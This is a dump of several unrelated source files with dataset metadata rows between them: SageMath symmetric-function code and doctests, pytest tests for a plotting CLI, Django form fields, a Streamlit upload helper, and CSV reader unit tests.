q^2*s[1, 1, 1, 1] + (q^2*t+q*t+q)*s[2, 1, 1] + (q^2*t^2+1)*s[2, 2] + (q*t^2+q*t+t)*s[3, 1] + t^2*s[4]
sage: Sym = SymmetricFunctions(QQ['z','q'].fraction_field())
sage: (z,q) = Sym.base_ring().gens()
sage: Hzq = Sym.macdonald(q=z,t=q).H()
sage: H1z = Sym.macdonald(q=1,t=z).H()
sage: s = Sym.schur()
sage: s(H1z([2,2]))
s[1, 1, 1, 1] + (2*z+1)*s[2, 1, 1] + (z^2+1)*s[2, 2] + (z^2+2*z)*s[3, 1] + z^2*s[4]
sage: s(Hzq[2,2])
z^2*s[1, 1, 1, 1] + (z^2*q+z*q+z)*s[2, 1, 1] + (z^2*q^2+1)*s[2, 2] + (z*q^2+z*q+q)*s[3, 1] + q^2*s[4]
sage: s(H1z(Hzq[2,2]))
z^2*s[1, 1, 1, 1] + (z^2*q+z*q+z)*s[2, 1, 1] + (z^2*q^2+1)*s[2, 2] + (z*q^2+z*q+q)*s[3, 1] + q^2*s[4]
"""
return macdonald.Macdonald(self, q=q, t=t)
def hall_littlewood(self, t='t'):
"""
Returns the entry point for the various Hall-Littlewood bases.
INPUT:
- ``t`` -- parameter
Hall-Littlewood symmetric functions including bases `P`, `Q`, `Qp`.
The Hall-Littlewood `P` and `Q` functions at `t=-1` are the
Schur-P and Schur-Q functions when indexed by strict partitions.
The parameter `t` must be in the base ring of parent.
EXAMPLES::
sage: Sym = SymmetricFunctions(FractionField(QQ['t']))
sage: P = Sym.hall_littlewood().P(); P
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Hall-Littlewood P basis
sage: P[2]
HLP[2]
sage: Q = Sym.hall_littlewood().Q(); Q
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Hall-Littlewood Q basis
sage: Q[2]
HLQ[2]
sage: Qp = Sym.hall_littlewood().Qp(); Qp
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Hall-Littlewood Qp basis
sage: Qp[2]
HLQp[2]
"""
return hall_littlewood.HallLittlewood(self, t=t)
def jack(self, t='t'):
"""
Returns the entry point for the various Jack bases.
INPUT:
- ``t`` -- parameter
Jack symmetric functions including bases `P`, `Q`, `Qp`.
The parameter `t` must be in the base ring of parent.
EXAMPLES::
sage: Sym = SymmetricFunctions(FractionField(QQ['t']))
sage: JP = Sym.jack().P(); JP
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Jack P basis
sage: JQ = Sym.jack().Q(); JQ
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Jack Q basis
sage: JJ = Sym.jack().J(); JJ
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Jack J basis
sage: JQp = Sym.jack().Qp(); JQp
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the Jack Qp basis
"""
return jack.Jack( self, t=t )
def zonal(self):
"""
The zonal basis of the Symmetric Functions
EXAMPLES::
sage: SymmetricFunctions(QQ).zonal()
Symmetric Functions over Rational Field in the zonal basis
"""
return jack.SymmetricFunctionAlgebra_zonal( self )
def llt(self, k, t='t'):
"""
The LLT symmetric functions.
INPUT:
- ``k`` -- a positive integer indicating the level
- ``t`` -- a parameter (default: `t`)
LLT polynomials in `hspin` and `hcospin` bases.
EXAMPLES::
sage: llt3 = SymmetricFunctions(QQ['t'].fraction_field()).llt(3); llt3
level 3 LLT polynomials over Fraction Field of Univariate Polynomial Ring in t over Rational Field
sage: llt3.hspin()
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the level 3 LLT spin basis
sage: llt3.hcospin()
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the level 3 LLT cospin basis
sage: llt3.hcospin()
Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field in the level 3 LLT cospin basis
"""
return llt.LLT_class( self, k, t=t )
def from_polynomial(self, f):
"""
Converts a symmetric polynomial ``f`` to a symmetric function.
INPUT:
- ``f`` -- a symmetric polynomial
This function converts a symmetric polynomial `f` in a polynomial ring in finitely
many variables to a symmetric function in the monomial
basis of the ring of symmetric functions over the same base ring.
EXAMPLES::
sage: P = PolynomialRing(QQ, 'x', 3)
sage: x = P.gens()
sage: f = x[0] + x[1] + x[2]
sage: S = SymmetricFunctions(QQ)
sage: S.from_polynomial(f)
m[1]
sage: f = x[0] + 2*x[1] + x[2]
sage: S.from_polynomial(f)
Traceback (most recent call last):
...
ValueError: x0 + 2*x1 + x2 is not a symmetric polynomial
"""
return self.m().from_polynomial(f)
def register_isomorphism(self, morphism, only_conversion=False):
"""
Register an isomorphism between two bases of ``self``, as a canonical coercion
(unless the optional keyword ``only_conversion`` is set to ``True``,
in which case the isomorphism is registered as conversion only).
EXAMPLES:
We override the canonical coercion from the Schur basis to the
powersum basis by a (stupid!) map `s_\lambda\mapsto 2p_\lambda`.
::
sage: Sym = SymmetricFunctions(QQ['zorglub']) # make sure we are not going to screw up later tests
sage: s = Sym.s(); p = Sym.p().dual_basis()
sage: phi = s.module_morphism(diagonal = lambda t: 2, codomain = p)
sage: phi(s[2, 1])
2*d_p[2, 1]
sage: Sym.register_isomorphism(phi)
sage: p(s[2,1])
2*d_p[2, 1]
The map is supposed to implement the canonical isomorphism
between the two bases. Otherwise, the results will be
mathematically wrong, as above. Use with care!
"""
if only_conversion:
morphism.codomain().register_conversion(morphism)
else:
morphism.codomain().register_coercion(morphism)
_shorthands = set(['e', 'h', 'm', 'p', 's'])
def inject_shorthands(self, shorthands = _shorthands):
"""
Imports standard shorthands into the global namespace
INPUT:
- ``shorthands`` -- a list (or iterable) of strings (default: ['e', 'h', 'm', 'p', 's'])
EXAMPLES::
sage: S = SymmetricFunctions(ZZ)
sage: S.inject_shorthands()
sage: s[1] + e[2] * p[1,1] + 2*h[3] + m[2,1]
s[1] - 2*s[1, 1, 1] + s[1, 1, 1, 1] + s[2, 1] + 2*s[2, 1, 1] + s[2, 2] + 2*s[3] + s[3, 1]
sage: e
Symmetric Functions over Integer Ring in the elementary basis
sage: p
Symmetric Functions over Integer Ring in the powersum basis
sage: s
Symmetric Functions over Integer Ring in the Schur basis
sage: e == S.e(), h == S.h(), m == S.m(), p == S.p(), s == S.s()
(True, True, True, True, True)
One can also just import a subset of the shorthands::
sage: S = SymmetricFunctions(QQ)
sage: S.inject_shorthands(['p', 's'])
sage: p
Symmetric Functions over Rational Field in the powersum basis
sage: s
Symmetric Functions over Rational Field in the Schur basis
Note that ``e`` is left unchanged::
sage: e
Symmetric Functions over Integer Ring in the elementary basis
"""
from sage.misc.misc import inject_variable
for shorthand in shorthands:
assert shorthand in self._shorthands
inject_variable(shorthand, getattr(self, shorthand)())
def __init_extra__(self):
"""
Sets up the coercions between the different bases
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ) # indirect doctest
sage: s = Sym.s(); p = Sym.p()
sage: f = s.coerce_map_from(p); f
Generic morphism:
From: Symmetric Functions over Rational Field in the powersum basis
To: Symmetric Functions over Rational Field in the Schur basis
sage: p.an_element()
2*p[] + 2*p[1] + 3*p[2]
sage: f(p.an_element())
2*s[] + 2*s[1] - 3*s[1, 1] + 3*s[2]
sage: f(p.an_element()) == p.an_element()
True
"""
#powersum = self.powersum ()
#complete = self.complete ()
#elementary = self.elementary()
#schur = self.schur ()
#monomial = self.monomial ()
iso = self.register_isomorphism
from sage.combinat.sf.classical import conversion_functions
for (basis1_name, basis2_name) in conversion_functions.keys():
basis1 = getattr(self, basis1_name)()
basis2 = getattr(self, basis2_name)()
on_basis = SymmetricaConversionOnBasis(t = conversion_functions[basis1_name,basis2_name], domain = basis1, codomain = basis2)
from sage.rings.rational_field import RationalField
if basis2_name != "powersum" or self._base.has_coerce_map_from(RationalField()):
iso(basis1._module_morphism(on_basis, codomain = basis2))
else:
# Don't register conversions to powersums as coercions,
# unless the base ring is a `\QQ`-algebra
# (otherwise the coercion graph loses commutativity).
iso(basis1._module_morphism(on_basis, codomain = basis2), only_conversion = True)
# Todo: fill in with other conversion functions on the classical bases
def kBoundedSubspace(self, k, t='t'):
r"""
Return the `k`-bounded subspace of the ring of symmetric functions.
INPUT:
- ``k`` -- a positive integer
- ``t`` -- a formal parameter; `t=1` yields a subring
The subspace of the ring of symmetric functions spanned by
`\{ s_{\lambda}[X/(1-t)] \}_{\lambda_1\le k} = \{ s_{\lambda}^{(k)}[X,t]\}_{\lambda_1 \le k}`
over the base ring `\mathbb{Q}[t]`. When `t=1`, this space is in fact a subalgebra of
the ring of symmetric functions generated by the complete homogeneous symmetric functions
`h_i` for `1\le i \le k`.
.. seealso:: :meth:`sage.combinat.sf.new_kschur.KBoundedSubspace`
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ)
sage: KB = Sym.kBoundedSubspace(3,1); KB
3-bounded Symmetric Functions over Rational Field with t=1
sage: Sym = SymmetricFunctions(QQ['t'])
sage: Sym.kBoundedSubspace(3)
3-bounded Symmetric Functions over Univariate Polynomial Ring in t over Rational Field
sage: Sym = SymmetricFunctions(QQ['z'])
sage: z = Sym.base_ring().gens()[0]
sage: Sym.kBoundedSubspace(3,t=z)
3-bounded Symmetric Functions over Univariate Polynomial Ring in z over Rational Field with t=z
"""
from sage.combinat.sf.new_kschur import KBoundedSubspace
return KBoundedSubspace(self, k, t=t)
def kschur(self, k, t ='t'):
r"""
Returns the `k`-Schur functions.
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ)
sage: ks = Sym.kschur(3,1)
sage: ks[2]*ks[2]
ks3[2, 2] + ks3[3, 1]
sage: ks[2,1,1].lift()
s[2, 1, 1] + s[3, 1]
sage: Sym = SymmetricFunctions(QQ['t'])
sage: ks = Sym.kschur(3)
sage: ks[2,2,1].lift()
s[2, 2, 1] + t*s[3, 2]
"""
return self.kBoundedSubspace(k, t=t).kschur()
def khomogeneous(self, k):
r"""
Returns the homogeneous symmetric functions in the `k`-bounded subspace.
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ)
sage: kh = Sym.khomogeneous(4)
sage: kh[3]*kh[4]
h4[4, 3]
sage: kh[4].lift()
h[4]
"""
return self.kBoundedSubspace(k, t=1).khomogeneous()
def kBoundedQuotient(self, k, t='t'):
r"""
Returns the `k`-bounded quotient space of the ring of symmetric functions.
INPUT:
- ``k`` -- a positive integer
The quotient of the ring of symmetric functions ...
.. seealso:: :meth:`sage.combinat.sf.k_dual.KBoundedQuotient`
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ)
sage: KQ = Sym.kBoundedQuotient(3); KQ
Traceback (most recent call last):
...
TypeError: unable to convert t to a rational
sage: KQ = Sym.kBoundedQuotient(3,t=1); KQ
3-Bounded Quotient of Symmetric Functions over Rational Field with t=1
sage: Sym = SymmetricFunctions(QQ['t'].fraction_field())
sage: KQ = Sym.kBoundedQuotient(3); KQ
3-Bounded Quotient of Symmetric Functions over Fraction Field of Univariate Polynomial Ring in t over Rational Field
"""
from sage.combinat.sf.k_dual import KBoundedQuotient
return KBoundedQuotient(self, k, t)
class SymmetricaConversionOnBasis:
def __init__(self, t, domain, codomain):
"""
Initialization of ``self``.
INPUT:
- ``t`` -- a function taking a monomial in CombinatorialFreeModule(QQ, Partitions()),
and returning a (partition, coefficient) list.
- ``domain``, ``codomain`` -- parents
Construct a function mapping a partition to an element of ``codomain``.
This is a temporary quick hack to wrap around the existing
symmetrica conversions, without changing their specs.
EXAMPLES::
sage: Sym = SymmetricFunctions(QQ[x])
sage: p = Sym.p(); s = Sym.s()
sage: def t(x) : [(p,c)] = x; return [ (p,2*c), (p.conjugate(), c) ]
sage: f = sage.combinat.sf.sf.SymmetricaConversionOnBasis(t, p, s)
sage: f(Partition([3,1]))
s[2, 1, 1] + 2*s[3, 1]
"""
self._domain = domain
self.fake_sym = CombinatorialFreeModule(QQ, Partitions())
self._codomain = codomain
self._t = t
def __call__(self, partition):
"""
sage: Sym = SymmetricFunctions(QQ[x])
sage: p = Sym.p(); s = Sym.s()
sage: p[1] + s[1] # indirect doctest
2*p[1]
"""
# TODO: use self._codomain.sum_of_monomials, when the later
# will have an optional optimization for the case when there
# is no repetition in the support
return self._codomain._from_dict(dict(self._t(self.fake_sym.monomial(partition))), coerce = True)
| 37.329726 | 140 | 0.585477 | 7,531 | 51,739 | 3.991369 | 0.120037 | 0.015969 | 0.01018 | 0.005456 | 0.360924 | 0.282411 | 0.229682 | 0.193187 | 0.172228 | 0.135034 | 0 | 0.040748 | 0.294671 | 51,739 | 1,385 | 141 | 37.356679 | 0.782945 | 0.802683 | 0 | 0.016807 | 0 | 0 | 0.009883 | 0 | 0 | 0 | 0 | 0.004332 | 0.016807 | 1 | 0.210084 | false | 0 | 0.176471 | 0 | 0.672269 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
8675c8c5e86ac10bb03d23826def9bd5917b7d31 | 91 | py | Python | tests/settings.py | Olerdrive/lucyfer | 548d122f72f30aa658a8d844e319bd9feab8ae6a | [
"MIT"
] | 5 | 2019-09-02T12:15:17.000Z | 2020-03-07T12:54:36.000Z | tests/settings.py | Olerdrive/lucyfer | 548d122f72f30aa658a8d844e319bd9feab8ae6a | [
"MIT"
] | 19 | 2019-08-12T12:00:13.000Z | 2019-11-11T14:14:38.000Z | tests/settings.py | Olerdrive/lucyfer | 548d122f72f30aa658a8d844e319bd9feab8ae6a | [
"MIT"
] | 3 | 2019-10-24T16:45:27.000Z | 2020-03-05T09:48:45.000Z | LUCYFER_SETTINGS = {
"SAVED_SEARCHES_ENABLE": False,
"SAVED_SEARCHES_KEY": None,
}
| 18.2 | 35 | 0.703297 | 10 | 91 | 5.9 | 0.8 | 0.440678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175824 | 91 | 4 | 36 | 22.75 | 0.786667 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
869a10978a36aa0ec09fb0893830708008c7185c | 2,126 | py | Python | tests/test_cli_spec.py | rai-project/scope_plot | e7fc1629f89fc48f820a1bce45bcc552d259e290 | [
"Apache-2.0"
] | null | null | null | tests/test_cli_spec.py | rai-project/scope_plot | e7fc1629f89fc48f820a1bce45bcc552d259e290 | [
"Apache-2.0"
] | 8 | 2018-08-13T20:27:48.000Z | 2018-08-30T11:40:32.000Z | tests/test_cli_spec.py | c3sr/scope_plot | e7fc1629f89fc48f820a1bce45bcc552d259e290 | [
"Apache-2.0"
] | null | null | null | import os
import pytest
from scope_plot import cli
pytest_plugins = ["pytester"]
FIXTURES_DIR = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "..", "__fixtures")
@pytest.fixture
def run(testdir):
def do_run(*args):
args = ["scope_plot", "--debug"] + list(args)
return testdir._run(*args)
return do_run
@pytest.fixture
def run_spec(testdir):
def do_run(spec_file):
spec_path = os.path.join(FIXTURES_DIR, spec_file)
output_path = os.path.join(FIXTURES_DIR, "test.pdf")
args = [
"scope_plot", "--debug", "--include", FIXTURES_DIR, "spec",
"--output", output_path, spec_path
]
return testdir._run(*args)
return do_run
@pytest.fixture
def run_spec_no_output(testdir):
def do_run(spec_file):
spec_path = os.path.join(FIXTURES_DIR, spec_file)
args = [
"scope_plot", "--debug", "--include", FIXTURES_DIR, "spec", spec_path
]
return testdir._run(*args)
return do_run
def test_spec_missing(tmpdir, run_spec):
result = run_spec("matplotlib_bar_missing.yml")
assert result.ret == 0
def test_bokeh_bar(tmpdir, run_spec):
result = run_spec("bokeh_bar.yml")
assert result.ret == 0
def test_bokeh_errorbar(tmpdir, run_spec):
result = run_spec("bokeh_errorbar.yml")
assert result.ret == 0
def test_bokeh_subplots(tmpdir, run_spec):
result = run_spec("bokeh_subplots.yml")
assert result.ret == 0
def test_matplotlib_bar(tmpdir, run_spec):
result = run_spec("matplotlib_bar.yml")
assert result.ret == 0
def test_matplotlib_errorbar(tmpdir, run_spec):
result = run_spec("matplotlib_errorbar.yml")
assert result.ret == 0
def test_matplotlib_regplot(tmpdir, run_spec):
result = run_spec("matplotlib_regplot.yml")
assert result.ret == 0
def test_matplotlib_subplots(tmpdir, run_spec):
result = run_spec("matplotlib_subplots.yml")
assert result.ret == 0
def test_no_output_on_cli(tmpdir, run_spec_no_output):
result = run_spec_no_output("errorbar_output.yml")
assert result.ret == 0
| 23.622222 | 81 | 0.676388 | 295 | 2,126 | 4.562712 | 0.152542 | 0.114413 | 0.086924 | 0.120357 | 0.753343 | 0.739227 | 0.720654 | 0.543091 | 0.204309 | 0.169391 | 0 | 0.0053 | 0.201317 | 2,126 | 89 | 82 | 23.88764 | 0.787397 | 0 | 0 | 0.40678 | 0 | 0 | 0.137818 | 0.044214 | 0 | 0 | 0 | 0 | 0.152542 | 1 | 0.254237 | false | 0 | 0.050847 | 0 | 0.40678 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
86a56bf132ec9905600491082d231a8ff09388f0 | 265 | py | Python | front/utils.py | etalab-ia/pdf_api | adfb1d54d66e794073285b91fcc86f70e33c02ae | [
"MIT"
] | null | null | null | front/utils.py | etalab-ia/pdf_api | adfb1d54d66e794073285b91fcc86f70e33c02ae | [
"MIT"
] | null | null | null | front/utils.py | etalab-ia/pdf_api | adfb1d54d66e794073285b91fcc86f70e33c02ae | [
"MIT"
] | null | null | null | import os
import streamlit as st
def save_uploaded_file(uploaded_file, path):
with open(os.path.join(path, uploaded_file.name), "wb") as f:
f.write(uploaded_file.getbuffer())
return st.success("Saved File:{} to {}".format(uploaded_file.name, path)) | 37.857143 | 77 | 0.716981 | 41 | 265 | 4.487805 | 0.560976 | 0.326087 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143396 | 265 | 7 | 77 | 37.857143 | 0.810573 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
86b83db1a4475c35a6d2678493f7612ed5e4b36c | 2,240 | py | Python | ldap_peoples/form_fields.py | fx74/django-ldap-academia-ou-manager | c5bffa963e389f970e1a8e257fe107ebbc201b54 | [
"BSD-2-Clause"
] | 16 | 2019-01-13T10:37:20.000Z | 2021-11-25T09:51:19.000Z | ldap_peoples/form_fields.py | fx74/django-ldap-academia-ou-manager | c5bffa963e389f970e1a8e257fe107ebbc201b54 | [
"BSD-2-Clause"
] | 1 | 2020-12-03T11:48:45.000Z | 2020-12-03T11:48:45.000Z | ldap_peoples/form_fields.py | fx74/django-ldap-academia-ou-manager | c5bffa963e389f970e1a8e257fe107ebbc201b54 | [
"BSD-2-Clause"
] | 4 | 2019-01-17T14:50:33.000Z | 2020-12-03T11:47:05.000Z | from django import forms
from django.core import validators
from django.core.exceptions import ValidationError  # used by ListField.has_changed below
from django.utils.translation import ugettext_lazy as _
class ListField(forms.Field):
def has_changed(self, initial, data):
"""Return True if data differs from initial."""
# Always return False if the field is disabled since self.bound_data
# always uses the initial value in this case.
# print(sorted(initial), sorted(data))
if self.disabled:
return False
try:
data = self.to_python(data)
if hasattr(self, '_coerce'):
return self._coerce(data) != self._coerce(initial)
except ValidationError:
return True
# For purposes of seeing whether something has changed, None is
# the same as an empty string, if the data or initial value we get
# is None, replace it with ''.
initial_value = initial if initial is not None else ''
data_value = data if data is not None else ''
return sorted(initial_value) != sorted(data_value)
class EmailListField(ListField):
pass
#def validate_email_list(value):
#print('EXEC')
#if not isinstance(value, list):
#raise ValidationError(
#_('%(value)s is not a list'),
#params={'value': value},
#)
#for item in value:
#validation = validators.validate_email(item)
#print(validation, item)
# TODO
#def validate(self, value):
#"""Check if value consists only of valid emails."""
#print(value)
#super().validate(value)
#for email in value:
#validate_email(email)
#default_validators = [validate_email_list]
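# --- Illustrative sketch (editor's addition, not the author's code) ---
# One possible completion of the commented-out email-list validation above:
# check that the value is a list/tuple and that every item is a valid e-mail
# address. It is deliberately not wired into ``default_validators``; names and
# messages are assumptions, not part of the original module.
def validate_email_list(value):
    if not isinstance(value, (list, tuple)):
        raise forms.ValidationError(
            _('%(value)s is not a list'),
            params={'value': value},
        )
    for item in value:
        # django.core.validators.validate_email raises ValidationError on bad input
        validators.validate_email(item)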
class ScopedListField(ListField):
pass
# TODO
# class TimeStampField(forms.SplitDateTimeField):
# widget = DateTimeInput
# input_formats = formats.get_format_lazy('DATETIME_INPUT_FORMATS')
# default_error_messages = {
# 'invalid': _('Enter a valid date/time.'),
# }
# def clean(self, value):
# value = self.to_python(value)
# self.validate(value)
# self.run_validators(value)
# print(self.__dict__, value)
# return value
| 32.463768 | 76 | 0.612946 | 259 | 2,240 | 5.169884 | 0.397683 | 0.035848 | 0.017924 | 0.019417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.291964 | 2,240 | 68 | 77 | 32.941176 | 0.844262 | 0.507589 | 0 | 0.1 | 0 | 0 | 0.006598 | 0 | 0 | 0 | 0 | 0.014706 | 0 | 1 | 0.05 | false | 0.1 | 0.15 | 0 | 0.55 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
86c85487bdd6c4b71d56f86b754f528eae27ea0d | 99 | py | Python | JuneLong19/xortest.py | mayank-kumar-giri/Competitive-Coding | 4cd26ede051bad15bf25cfd037317c313b607507 | [
"MIT"
] | null | null | null | JuneLong19/xortest.py | mayank-kumar-giri/Competitive-Coding | 4cd26ede051bad15bf25cfd037317c313b607507 | [
"MIT"
] | null | null | null | JuneLong19/xortest.py | mayank-kumar-giri/Competitive-Coding | 4cd26ede051bad15bf25cfd037317c313b607507 | [
"MIT"
] | null | null | null | n = 95
for i in range(1,1000):
a = n ^ i
print(bin(a),a)
print(i,bin(n),n)
print() | 14.142857 | 23 | 0.484848 | 21 | 99 | 2.285714 | 0.52381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102941 | 0.313131 | 99 | 7 | 24 | 14.142857 | 0.602941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
86de7ae33a8de99b470fdd69c5cb0a9fbc95628a | 714 | py | Python | transition.py | RaghubirChimni/LogGenerator | fc7a52ddad15b0885d9f14ffe2d3f017fac63b01 | [
"MIT"
] | 1 | 2019-06-11T20:32:04.000Z | 2019-06-11T20:32:04.000Z | transition.py | GabrielSiq/LogGenerator | c3103059bc9a8088d760d756836f6fd0a0b49cd0 | [
"MIT"
] | null | null | null | transition.py | GabrielSiq/LogGenerator | c3103059bc9a8088d760d756836f6fd0a0b49cd0 | [
"MIT"
] | 2 | 2020-11-16T18:54:15.000Z | 2021-01-22T22:18:59.000Z | from typing import Union, Tuple
from duration import Duration
class Transition:
# Initialization and instance variables
def __init__(self, source: str, destination: str, sgate: str = None, dgate: str = None, distribution: Union[dict, int] = 0) -> None:
self.source = source
self.source_gate = sgate
self.destination = destination
self.destination_gate = dgate
self.delay = Duration(distribution)
# Public methods
def get_next(self) -> Tuple[str, str, int]:
return self.destination, self.destination_gate, self.delay.generate()
# Private methods
def __repr__(self):
return ', '.join("%s: %s" % item for item in vars(self).items())
| 34 | 136 | 0.665266 | 87 | 714 | 5.321839 | 0.482759 | 0.12959 | 0.112311 | 0.12959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001818 | 0.229692 | 714 | 20 | 137 | 35.7 | 0.84 | 0.095238 | 0 | 0 | 0 | 0 | 0.012461 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0 | 0.153846 | 0.153846 | 0.615385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
86e56f2059cbc90d0370dd853a96bccd5507662e | 8,973 | py | Python | tests/test_csv_file.py | changrunner/zeppos_csv | 5b55619bb3baec4c1a676d904bec4fd573d220a9 | [
"Apache-2.0"
] | null | null | null | tests/test_csv_file.py | changrunner/zeppos_csv | 5b55619bb3baec4c1a676d904bec4fd573d220a9 | [
"Apache-2.0"
] | null | null | null | tests/test_csv_file.py | changrunner/zeppos_csv | 5b55619bb3baec4c1a676d904bec4fd573d220a9 | [
"Apache-2.0"
] | null | null | null | import unittest
from zeppos_csv.csv_file import CsvFile
from tests.util_for_testing import UtilForTesting
from zeppos_bcpy.sql_configuration import SqlConfiguration
import os
from zeppos_logging.app_logger import AppLogger
import pandas as pd
from pandas._testing import assert_frame_equal
class TestProjectMethods(unittest.TestCase):
def setUp(self):
UtilForTesting.file_clean_up()
def tearDown(self):
UtilForTesting.file_clean_up()
def test_constructor_method(self):
self.assertEqual(str(type(CsvFile(r"c:\temp\test1.csv"))), "<class 'zeppos_csv.csv_file.CsvFile'>")
def test_get_dataframe_windows_encoding_with_header(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c1',
content="col1,col2\ntest1,test2")
df = CsvFile(full_file_name_list[0]).get_dataframe_windows_encoding_with_header()
self.assertEqual(1, df.shape[0])
def test_get_dataframe_windows_encoding_with_header_and_chunking_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c2', content="col1,col2\ntest1,test2")
df_chunks = CsvFile(full_file_name_list[0]).get_dataframe_windows_encoding_with_header_and_chunking()
self.assertEqual(1, df_chunks.get_chunk().shape[0])
def test_get_dataframe_windows_encoding_without_header(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c3', content="test1,test2")
df = CsvFile(full_file_name_list[0]).get_dataframe_windows_encoding_without_header(['col1','col2'])
self.assertEqual(1, df.shape[0])
def test_get_dataframe_windows_encoding_without_header_and_chunking_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c4', content="test1,test2\ntest1,test2\n")
df_chunks = CsvFile(full_file_name_list[0]).get_dataframe_windows_encoding_without_header_and_chunking(['col1', 'col2'])
self.assertEqual(2, df_chunks.get_chunk().shape[0])
def test_get_dataframe_utf8_encoding_with_header_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c5', content="col1|col2\ntest1|test2")
df = CsvFile(full_file_name_list[0]).get_dataframe_utf8_encoding_with_header()
self.assertEqual(df.shape[0], 1)
self.assertEqual(df.columns[0], 'col1')
self.assertEqual(df.columns[1], 'col2')
def test_get_dataframe_utf8_encoding_without_header_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c6', content="test1,test2")
df = CsvFile(full_file_name_list[0]).get_dataframe_utf8_encoding_without_header(['col1', 'col2'])
self.assertEqual(df.shape[0], 1)
self.assertEqual(df.columns[0], 'col1')
self.assertEqual(df.columns[1], 'col2')
def test_get_dataframe_utf8_encoding_with_header_and_chunkung_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c7',
content="col1,col2\ntest1,test2")
df = CsvFile(full_file_name_list[0]).get_dataframe_utf8_encoding_with_header_and_chunking()
self.assertEqual(df.get_chunk().shape[0], 1)
def test_get_dataframe_utf8_encoding_without_header_and_chunking_method(self):
temp_dir, file_dir, full_file_name_list = UtilForTesting.file_setup('test_df_c8', content="test1,test2")
df = CsvFile(full_file_name_list[0]).get_dataframe_utf8_encoding_without_header_and_chunking(['col1', 'col2'])
self.assertEqual(df.get_chunk().shape[0], 1)
#################################################
# Test file_manager.file inherited functionality
#################################################
def test_file_name_property(self):
self.assertEqual(CsvFile("c:\\temp\\test.csv").file_name, "test.csv")
def test_full_file_name_property(self):
